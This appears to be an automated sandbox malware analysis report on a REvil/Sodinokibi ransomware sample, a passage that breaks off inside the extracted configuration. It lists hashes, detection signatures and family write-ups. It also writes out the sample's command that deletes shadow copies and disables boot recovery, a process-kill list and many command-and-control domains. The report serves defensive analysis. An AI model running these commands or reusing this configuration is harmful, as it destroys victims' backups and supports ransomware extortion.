Edit tour

Windows Analysis Report
RQzHm5vLxs.exe

Overview

General Information

Sample Name:	RQzHm5vLxs.exe
Original Sample Name:	17d153a225ea04a229862875795eeec0adb8c3e2769ba0e05073baaf86850467.exe
Analysis ID:	1343919
MD5:	ca337c7130eef4f4ff8e8a4a8ec28647
SHA1:	28558e35d3f9af01fe438eba7fba1c38201c86de
SHA256:	17d153a225ea04a229862875795eeec0adb8c3e2769ba0e05073baaf86850467
Tags:	exeSodinokibi
Infos:

Detection

Sodinokibi, Chaos, Conti, Netwalker, Revil, TrojanRansom

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Conti ransomware

Yara detected Sodinokibi Ransomware

Sigma detected: Sodinokibi

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected TrojanRansom

Found ransom note / readme

Antivirus / Scanner detection for submitted sample

Yara detected Netwalker ransomware

Yara detected Revil

Antivirus detection for URL or domain

Yara detected RansomwareGeneric

Yara detected Chaos Ransomware

Found evasive API chain (may stop execution after checking mutex)

Found Tor onion address

Uses bcdedit to modify the Windows boot settings

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Posts data to a JPG file (protocol mismatch)

Contains functionalty to change the wallpaper

Writes a notice file (html or txt) to demand a ransom

Deletes shadow drive data (may be related to ransomware)

Contains functionality to detect sleep reduction / modifications

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks for available system drives (often done to infect USB drives)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

RQzHm5vLxs.exe (PID: 6232 cmdline: C:\Users\user\Desktop\RQzHm5vLxs.exe MD5: CA337C7130EEF4F4FF8E8A4A8EC28647)

cmd.exe (PID: 3052 cmdline: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
REvil, Sodinokibi	REvil BetaMD5: bed6fc04aeb785815744706239a1f243SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bfSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45* Privilege escalation via CVE-2018-8453 (64-bit only)* Rerun with RunAs to elevate privileges* Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur* Implements target whitelisting using GetKetboardLayoutList* Contains debug console logging functionality* Defines the REvil registry root key as SOFTWARE\!test* Includes two variable placeholders in the ransom note: UID & KEY* Terminates processes specified in the "prc" configuration key prior to encryption* Deletes shadow copies and disables recovery* Wipes contents of folders specified in the "wfld" configuration key prior to encryption* Encrypts all non-whitelisted files on fixed drives* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe* Partially implements a background image setting to display a basic "Image text" message* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)------------------------------------REvil 1.00MD5: 65aa793c000762174b2f86077bdafaeaSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc* Adds 32-bit implementation of CVE-2018-8453 exploit* Removes console debug logging* Changes the REvil registry root key to SOFTWARE\recfg* Removes the System/Impersonation success requirement for encrypting network mapped drives* Adds a "wipe" key to the configuration for optional folder wiping* Fully implements the background image setting and leverages values defined in the "img" configuration key* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data------------------------------------REvil 1.01MD5: 2abff29b4d87f30f011874b6e98959e9SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732cSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level* Makes encryption of network mapped drives optional by adding the "-nolan" argument------------------------------------REvil 1.02MD5: 4af953b20f3a1f165e7cf31d6156c035SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage* Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)* Enhances folder whitelisting logic that take special considerations if the folder is associated with "program files" directories* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories* Hard-codes whitelisting of "sql" subfolders within program files* Encrypts program files sub-folders that does not contain "sql" in the path* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted* Encodes stored strings used for URI building within the binary and decodes them in memory right before use* Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key------------------------------------REvil 1.03MD5: 3cae02306a95564b1fff4ea45a7dfc00SHA1: 0ce2cae5287a64138d273007b34933362901783dSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf* Removes lock file logic that was partially implemented in 1.02* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)* Encodes stored shellcode* Adds the -path argument:* Does not wipe folders (even if wipe == true)* Does not set desktop background* Does not contact the C2 server (even if net == true)* Encrypts files in the specified folder and drops the ransom note* Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults* Changes registry key values from --> to: * sub_key --> pvg * pk_key --> sxsP * sk_key --> BDDC8 * 0_key --> f7gVD7 * rnd_ext --> Xu7Nnkd * stat --> sMMnxpgk------------------------------------REvil 1.04MD5: 6e3efb83299d800edf1624ecbc0665e7SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0dSHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)* Removes the folder wipe capability* Changes the REvil registry root key to SOFTWARE\GitForWindows* Changes registry key values from --> to: * pvg --> QPM * sxsP --> cMtS * BDDC8 --> WGg7j * f7gVD7 --> zbhs8h * Xu7Nnkd --> H85TP10 * sMMnxpgk --> GCZg2PXD------------------------------------REvil v1.05MD5: cfefcc2edc5c54c74b76e7d1d29e69b2SHA1: 7423c57db390def08154b77e2b5e043d92d320c7SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' : * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.* Changes registry key values from --> to: * QPM --> tgE * cMtS --> 8K09 * WGg7j --> xMtNc * zbhs8h --> CTgE4a * H85TP10 --> oE5bZg0 * GCZg2PXD --> DC408Qp4------------------------------------REvil v1.06MD5: 65ff37973426c09b9ff95f354e62959eSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77eSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'* Changes registry key values from --> to: * tgE --> 73g * 8K09 --> vTGj * xMtNc --> Q7PZe * CTgE4a --> BuCrIp * oE5bZg0 --> lcZd7OY * DC408Qp4 --> sLF86MWC------------------------------------REvil v1.07MD5: ea4cae3d6d8150215a4d90593a4c30f2SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894eSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3TBD	Pinchy Spider	http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html http://www.secureworks.com/research/threat-profiles/gold-southfield https://analyst1.com/file-assets/History-of-REvil.pdf https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf https://asec.ahnlab.com/ko/19640/	https://malpedia.caad.fkie.fraunhofer.de/details/win.revil

Name	Description	Attribution	Blogpost URLs	Link
Chaos	In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.	No Attribution	https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/ https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/ https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/	https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos

Name	Description	Attribution	Blogpost URLs	Link
Conti, Conti Lock	Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.	No Attribution	http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/ https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74 https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/	https://malpedia.caad.fkie.fraunhofer.de/details/win.conti

Name	Description	Attribution	Blogpost URLs	Link
Mailto, NetWalker		No Attribution	https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/ https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/	https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto

Name	Description	Attribution	Blogpost URLs	Link
REvil	REvil BetaMD5: bed6fc04aeb785815744706239a1f243SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bfSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45* Privilege escalation via CVE-2018-8453 (64-bit only)* Rerun with RunAs to elevate privileges* Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur* Implements target whitelisting using GetKetboardLayoutList* Contains debug console logging functionality* Defines the REvil registry root key as SOFTWARE\!test* Includes two variable placeholders in the ransom note: UID & KEY* Terminates processes specified in the "prc" configuration key prior to encryption* Deletes shadow copies and disables recovery* Wipes contents of folders specified in the "wfld" configuration key prior to encryption* Encrypts all non-whitelisted files on fixed drives* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe* Partially implements a background image setting to display a basic "Image text" message* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)------------------------------------REvil 1.00MD5: 65aa793c000762174b2f86077bdafaeaSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc* Adds 32-bit implementation of CVE-2018-8453 exploit* Removes console debug logging* Changes the REvil registry root key to SOFTWARE\recfg* Removes the System/Impersonation success requirement for encrypting network mapped drives* Adds a "wipe" key to the configuration for optional folder wiping* Fully implements the background image setting and leverages values defined in the "img" configuration key* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data------------------------------------REvil 1.01MD5: 2abff29b4d87f30f011874b6e98959e9SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732cSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level* Makes encryption of network mapped drives optional by adding the "-nolan" argument------------------------------------REvil 1.02MD5: 4af953b20f3a1f165e7cf31d6156c035SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage* Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)* Enhances folder whitelisting logic that take special considerations if the folder is associated with "program files" directories* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories* Hard-codes whitelisting of "sql" subfolders within program files* Encrypts program files sub-folders that does not contain "sql" in the path* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted* Encodes stored strings used for URI building within the binary and decodes them in memory right before use* Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key------------------------------------REvil 1.03MD5: 3cae02306a95564b1fff4ea45a7dfc00SHA1: 0ce2cae5287a64138d273007b34933362901783dSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf* Removes lock file logic that was partially implemented in 1.02* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)* Encodes stored shellcode* Adds the -path argument:* Does not wipe folders (even if wipe == true)* Does not set desktop background* Does not contact the C2 server (even if net == true)* Encrypts files in the specified folder and drops the ransom note* Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults* Changes registry key values from --> to: * sub_key --> pvg * pk_key --> sxsP * sk_key --> BDDC8 * 0_key --> f7gVD7 * rnd_ext --> Xu7Nnkd * stat --> sMMnxpgk------------------------------------REvil 1.04MD5: 6e3efb83299d800edf1624ecbc0665e7SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0dSHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)* Removes the folder wipe capability* Changes the REvil registry root key to SOFTWARE\GitForWindows* Changes registry key values from --> to: * pvg --> QPM * sxsP --> cMtS * BDDC8 --> WGg7j * f7gVD7 --> zbhs8h * Xu7Nnkd --> H85TP10 * sMMnxpgk --> GCZg2PXD------------------------------------REvil v1.05MD5: cfefcc2edc5c54c74b76e7d1d29e69b2SHA1: 7423c57db390def08154b77e2b5e043d92d320c7SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' : * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.* Changes registry key values from --> to: * QPM --> tgE * cMtS --> 8K09 * WGg7j --> xMtNc * zbhs8h --> CTgE4a * H85TP10 --> oE5bZg0 * GCZg2PXD --> DC408Qp4------------------------------------REvil v1.06MD5: 65ff37973426c09b9ff95f354e62959eSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77eSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'* Changes registry key values from --> to: * tgE --> 73g * 8K09 --> vTGj * xMtNc --> Q7PZe * CTgE4a --> BuCrIp * oE5bZg0 --> lcZd7OY * DC408Qp4 --> sLF86MWC------------------------------------REvil v1.07MD5: ea4cae3d6d8150215a4d90593a4c30f2SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894eSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3TBD	Pinchy Spider	http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html http://www.secureworks.com/research/threat-profiles/gold-southfield https://analyst1.com/file-assets/History-of-REvil.pdf https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf https://asec.ahnlab.com/ko/19640/	https://malpedia.caad.fkie.fraunhofer.de/details/win.revil

Malware Configuration

Threatname: REvil

{"pk": "N9tiPqA45L8cXACRHlBdJFayV8M5MEF4JjppDRO+oHU=", "pid": "30", "sub": "113", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["perflogs", "$windows.~ws", "system volume information", "google", "programdata", "appdata", "windows.old", "windows", "intel", "program files", "application data", "msocache", "mozilla", "$windows.~bt", "boot", "$recycle.bin", "tor browser", "program files (x86)"], "fls": ["ntuser.ini", "thumbs.db", "ntuser.dat", "autorun.inf", "ntldr", "ntuser.dat.log", "bootsect.bak", "boot.ini", "iconcache.db", "bootfont.bin", "desktop.ini"], "ext": ["cpl", "cmd", "diagpkg", "adv", "mod", "ico", "deskthemepack", "msi", "ani", "cab", "theme", "scr", "hlp", "com", "prf", "msp", "exe", "mpa", "diagcab", "key", "386", "hta", "ps1", "nls", "drv", "cur", "dll", "diagcfg", "icl", "bin", "spl", "msc", "lnk", "rom", "bat", "lock", "themepack", "ldf", "nomedia", "msstyles", "rtp", "sys", "msu", "icns", "shs", "ocx", "idx", "wpx", "ics"]}, "wfld": ["backup"], "prc": ["thebat64.exe", "dbsnmp.exe", "mydesktopqos.exe", "wordpad.exe", "sqlwriter.exe", "agntsvc.exe", "winword.exe", "mysqld.exe", "excel.exe", "mysqld_nt.exe", "msaccess.exe", "sqlbrowser.exe", "isqlplussvc.exe", "encsvc.exe", "steam.exe", "infopath.exe", "sqlservr.exe", "oracle.exe", "sqbcoreservice.exe", "thebat.exe", "firefoxconfig.exe", "ocomm.exe", "mydesktopservice.exe", "tbirdconfig.exe", "msftesql.exe", "thunderbird.exe", "onenote.exe", "mspub.exe", "xfssvccon.exe", "dbeng50.exe", "ocautoupds.exe", "visio.exe", "sqlagent.exe", "powerpnt.exe", "synctime.exe", "ocssd.exe", "mysqld_opt.exe", "outlook.exe"], "dmn": "p-ride.live;avtoboss163.ru:443;rarefoods.ro;brownswoodblog.com;patriotcleaning.net;so-sage.fr;katherinealy.com;innovationgames-brabant.nl;eshop.design;drvoip.com;liepertgrafikweb.at;rino-gmbh.com;monstarrsoccer.com;thenalpa.com;thiagoperez.com;fskhjalmar.se;eafx.pro;oncarrot.com;axisoflove.org:443;aquacheck.co.za;bajova.sk;innovationgames-brabant.nl;charlottelhanna.com;ilovefullcircle.com;dnqa.co.uk;catalyseurdetransformation.com;imajyuku-sozoku.com;kelsigordon.com;handyman-silkeborg.dk;pxsrl.it;poems-for-the-soul.ch;jimprattmediations.com;gaearoyals.com;advance-refle.com;pixelhealth.net;electricianul.com;unexplored.gr;look.academy;endlessrealms.net;bonitabeachassociation.com;pro-gamer.pl;donau-guides.eu;9nar.com;hartofurniture.com;silverbird.dk;smartercashsystem.com;pedmanson.com;publicompserver.de;georgemuncey.com;delegationhub.com;kenmccallum.com;rentingwell.com;animation-pro.co.uk;diakonie-weitramsdorf-sesslach.de;hiddensee-buhne11.de;expohomes.com;laylavalentine.com;quitescorting.com;pisofare.co;babysitting-hk.helpergo.co;johnsonweekly.com;jglconsultancy.com;barbaramcfadyenjewelry.com;alnectus.com;matthieupetel.fr;sber-biznes.com;supercarhire.co.uk;sunsolutions.es;the-cupboard.co.uk;computer-place.de;jobstomoveamerica.org;testitjavertailut.net;go.labibini.ch;funworx.de;chatterchatterchatter.com;lsngroupe.com;iexpert99.com;espaciopolitica.com;skinkeeper.li;cookinn.nl;zuerich-umzug.ch;toranjtuition.org;fidelitytitleoregon.com;pankiss.ru;amyandzac.com;janmorgenstern.com;keyboardjournal.com;fire-space.com;grafikstudio-visuell.de;ufovidmag.com;corporacionrr.com;jeanmonti.com;baptistdistinctives.org;jalkapuu.net;placermonticello.com;unboxtherapy.site;jollity.hu;housesofwa.com;sbit.ag;drnelsonpediatrics.com;grupoexin10.com;klapanvent.ru;davedavisphotos.com;pajagus.fr;spartamovers.com;etgdogz.de;legundschiess.de;soncini.ch;cmeow.com;111firstdelray.com;tieronechic.com;lesyeuxbleus.net;kickittickets.com;awag-blog.de;skolaprome.eu;graygreenbiomedservices.com;concontactodirecto.com;block-optic.com;golfclublandgoednieuwkerk.nl;auberives-sur-vareze.fr;casinodepositors.com;kausette.com;acibademmobil.com.tr;diverfiestas.com.es;skoczynski.eu;paprikapod.com;jlwilsonbooks.com;baikalflot.ru;dayenne-styling.nl;rs-danmark.dk;hnkns.com;kemtron.fr;husetsanitas.dk;dentallabor-luenen.de;oththukaruva.com;baita.ac;aktivfriskcenter.se;iactechnologies.net;hotelturbo.de;encounter-p.net;signededenroth.dk;fi-institutionalfunds.com;floweringsun.org;rentsportsequip.com;abulanov.com;web865.com;nbva.co.uk;mneti.ru;xn--billigafrgpatroner-stb.se;wirmuessenreden.com;bilius.dk;wrinstitute.org;karmeliterviertel.com;smartspeak.com;blucamp.com;jakubrybak.com;phoenixcrane.com;billigeflybilletter.dk;rsidesigns.com;hinotruckwreckers.com.au;cxcompany.com;yayasanprimaunggul.org;deduktia.fi;matteoruzzaofficial.com;volta.plus;eastgrinsteadwingchun.com;livelai.com;betterce.com;veggienessa.com;buzzneakers.com;stralsund-ansichten.de;leansupremegarcinia.net;invela.dk;cac2040.com;lagschools.ng;ciga-france.fr;gta-jjb.fr;buonabitare.com;wallflowersandrakes.com;mamajenedesigns.com;mahikuchen.com;dr-vita.de;renehartman.nl;basindentistry.com;mrkluttz.com;angelsmirrorus.com;yournextshoes.com;eyedoctordallas.com;nepal-pictures.com;plbinsurance.com;triavlete.com;switch-made.com;innervisions-id.com;mac-computer-support-hamburg.de;dinedrinkdetroit.com;scholarquotes.com;pazarspor.org.tr;gurutechnologies.net;otpusk.zp.ua;alharsunindo.com;chainofhopeeurope.eu;walterman.es;adabible.org;theintellect.edu.pk;alcye.com;peppergreenfarmcatering.com.au;mesajjongeren.nl;reputation-medical.online;redctei.co;kuriero.pro;limmortelyouth.com;napisat-pismo-gubernatoru.ru:443;awaisghauri.com;loparnille.se;sololibrerie.it;aberdeenartwalk.org;biodentify.ai;bmw-i-pure-impulse.com;wg-heiligenstadt.de;letsstopsmoking.co.uk;fann.ru;cmascd.com;precisetemp.com;parisschool.ru;zealcon.ae;smartworkplaza.com;druktemakersheerenveen.nl;racefietsenblog.nl;lidkopingsnytt.nu;onlinemarketingsurgery.co.uk;shortsalemap.com;sytzedevries.com;stagefxinc.com;advesa.com;therapybusinessacademy.com;voice2biz.com;lovetzuchia.com;bcabattoirs.org;coachpreneuracademy.com;vvego.com;daveystownhouse.com;proffteplo.com;dmlcpa.com;humanviruses.org;benchbiz.com;alaskaremote.com;penumbuhrambutkeiskei.com;jonnyhooley.com;lunoluno.com;domaine-des-pothiers.com;theater-lueneburg.de;neolaiamedispa.com;mazzaropi.com.br;richardkershawwines.co.za;chatberlin.de;ludoil.it;rtc24.com;relevantonline.eu;hekecrm.com;insane.agency;leadforensics.com;distrifresh.com;morgansconsult.com;kryptos72.com;secrets-clubs.co.uk;slotspinner.com;chinowarehousespace.com;agora-collectivites.com;liveyourheartout.co;denhaagfoodie.nl;baumfinancialservices.com;k-v-f.de;lattalvor.com;akcadagofis.com;frimec-international.es;activeterroristwarningcompany.com;craftron.com;purepreprod4.com;schluesseldienste-hannover.de;ronaldhendriks.nl;brinkdoepke.eu;utilisacteur.fr;malzomattalar.com;almamidwifery.com;dreamvoiceclub.org;cl0nazepamblog.com;avisioninthedesert.com;condormobile.fr;ultimatelifesource.com;bratek-immobilien.de;jax-interim-and-projectmanagement.com;anchelor.com;mike.matthies.de;rattanwarehouse.co.uk;business-basic.de;successcolony.com.ng;taulunkartano.fi;mjk.digital;techybash.com;acumenconsultingcompany.com;docarefoundation.org;amelielecompte.wordpress.com;galatee-couture.com;lmmont.sk;saboboxtel.uk;acornishstudio.co.uk;focuskontur.com;craftstone.co.nz;buerocenter-butzbach-werbemittel.de;fluzfluzrewards.com;rubyaudiology.com;marcandy.com;modamarfil.com;shortysspices.com;bavovrienden.nl;silkeight.com;selected-minds.de;fbmagazine.ru;forextimes.ru;rapid5kloan.org;trivselsguide.dk;epsondriversforwindows.com;sambaglow.com;margaretmcshane.com;tothebackofthemoon.com;azloans.com;mgimalta.com;bubbalucious.com;kellengatton.com;nevadaruralhousingstudies.org;spacebel.be;gatlinburgcottage.com;peninggibadan.co.id;mayprogulka.ru;midwestschool.org;edrickennedymacfoy.com;nykfdyrehospital.dk;sprintcoach.com;irizar.com;dieetuniversiteit.nl;mollymccarthydesign.com;bluetenreich-brilon.de;lumturo.academy;acb-gruppe.ch;angeleyezstripclub.com;augen-praxisklinik-rostock.de;arearugcleaningnyc.com;aoyama.ac;forumsittard.nl;outstandingminialbums.com;arthakapitalforvaltning.dk;bumbipdeco.site;agencewho-aixenprovence.fr;pureelements.nl;yourhappyevents.fr;towelroot.co;ownidentity.com;kenmccallum.com;voetbalhoogeveen.nl;jmmartinezilustrador.com;palema.gr;stoneridgemontessori.com;keuken-prijs.nl;g2mediainc.com;satoblog.org;inewsstar.com;ninjaki.com;metallbau-hartmann.eu;terraflair.de;agrifarm.dk;scietech.academy;goodboyscustom.com;johnstonmingmanning.com;greeneyetattoo.com;nvisionsigns.com;thehovecounsellingpractice.co.uk;nauticmarine.dk;karelinjames.com;o2o-academy.com;vedsegaard.dk;boomerslivinglively.com;thegetawaycollective.com;90nguyentuan.com;cesep2019.com;craftingalegacy.com;amorbellezaysalud.com;memphishealthandwellness.com;carolynfriedlander.com;paardcentraal.nl;smarttourism.academy;ingresosextras.online;kombi-dress.com;blueridgeheritage.com;ntinasfiloxenia.gr;zwemofficial.nl;gavelmasters.com;hostaletdelsindians.es;jefersonalessandro.com;opt4cdi.com;cap29010.it;tesisatonarim.com;eventosvirtualesexitosos.com;strauchs-wanderlust.info;denverwynkoopdentist.com;hutchstyle.co.uk;krishnabrawijaya.com;globalcompliancenews.com;imaginekithomes.co.nz;skyboundnutrition.co.uk;stringnosis.academy;fysiotherapierijnmond.nl;rolleepollee.com;mrcar.nl;goddardleadership.org;geitoniatonaggelon.gr;cops4causes.org;chris-anne.com;bayshoreelite.com;imagine-entertainment.com;oscommunity.de;fanuli.com.au;jayfurnitureco.com;mindsparkescape.com;crestgood.com;bulyginnikitav.000webhostapp.com;thisprettyhair.com;cyberpromote.de;marmarabasin.com;gazelle-du-web.com;tetameble.pl;zumrutkuyutemel.com;hepishopping.com;brannbornfastigheter.se;wribrazil.com;heuvelland-oaze.nl;dibli.store;k-zubki.ru;pays-saint-flour.fr;dinecorp.com;khtrx.com;maryairbnb.wordpress.com;artvark.nl;richardmaybury.co.uk;circlecitydj.com;makingmillionaires.net;comoserescritor.com;efficiencyconsulting.es;rivermusic.nl;chomiksy.net;jag.me;photonag.com;ravage-webzine.nl;studionumerik.fr;parentsandkids.com;verbouwingsdouche.nl;charlesfrancis.photos;natturestaurante.com.br;goodherbalhealth.com;linearete.com;bychowo.pl;aidanpublishing.co.uk;schlagbo